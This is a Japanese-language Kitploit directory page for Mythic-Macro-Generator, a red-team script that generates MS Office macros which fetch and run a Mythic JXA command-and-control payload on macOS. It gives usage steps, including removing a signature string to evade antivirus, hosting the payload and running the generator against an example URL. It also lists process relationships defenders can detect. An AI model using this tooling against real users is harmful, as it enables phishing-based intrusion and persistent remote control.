Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Mythic-Macro-Generator — Mythicペイロードを起動するマクロを生成するPython3スクリプト。作者: Cedric Owens | Kitploit
ツール/GitHubGitHub/cedowens/mythic-macro-generator
フィッシングツールエクスプロイトフレームワークペイロード生成ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubcedowens/mythic-macro-generator

Mythic-Macro-Generator

Mythicペイロードを起動するマクロを生成するPython3スクリプト。作者: Cedric Owens

リポジトリを見る
4795年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Mythic-Macro-Generator

Mythic JXAペイロードを起動するためのMS Officeマクロを生成するPython3スクリプト。

このスクリプトは、osascriptを使用してMythic JXA .jsペイロードをダウンロードおよび実行するOfficeマクロを生成します。

手順:

  1. Mythic C2サーバーをセットアップし、"apfell" JXAペイロードを生成します(注意:このジェネレーターはペイロードがhttpを使用していることを前提としています...httpsを使用している場合は、curlがhttpsを使用するようにジェネレータースクリプトを変更できます)。そのペイロードをMythicサーバーにダウンロードします。

  2. Mythic JXA .jsランチャーの最初の行("// Created by Cody Thomas - @its_a_feature_")を削除します。一部の静的A/Vシグネチャはこの静的文字列をチェックすることが知られています。そのペイロードをホストします(例:.jsペイロードをフォルダーに置き、python -m SimpleHTTPServerを使用してホスト)。

  3. このマクロジェネレーターを実行します:

python3 jxa-macro.py -u [url to the hosted .js payload in #2 above]

例:python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js

  1. マクロテキストは同じディレクトリの "macro.txt" というファイルに出力されます。

  2. そのマクロをコピーしてMS Officeドキュメントに貼り付けます。


検出:

このマクロは、検出に使用できる以下の親子関係を生成します:

  • Office Product (例:Microsoft Word.app) --> /bin/sh
  • Office Product (例:Microsoft Word.app) --> /bin/bash
  • Office Product (例:Microsoft Word.app) --> /usr/bin/curl

注:これにより、JXAペイロードがApp Sandbox内で起動されます。ただし、MythicはApp SandboxからでもLogin Itemの永続化を追加する機能を持っています。

ツールをダウンロード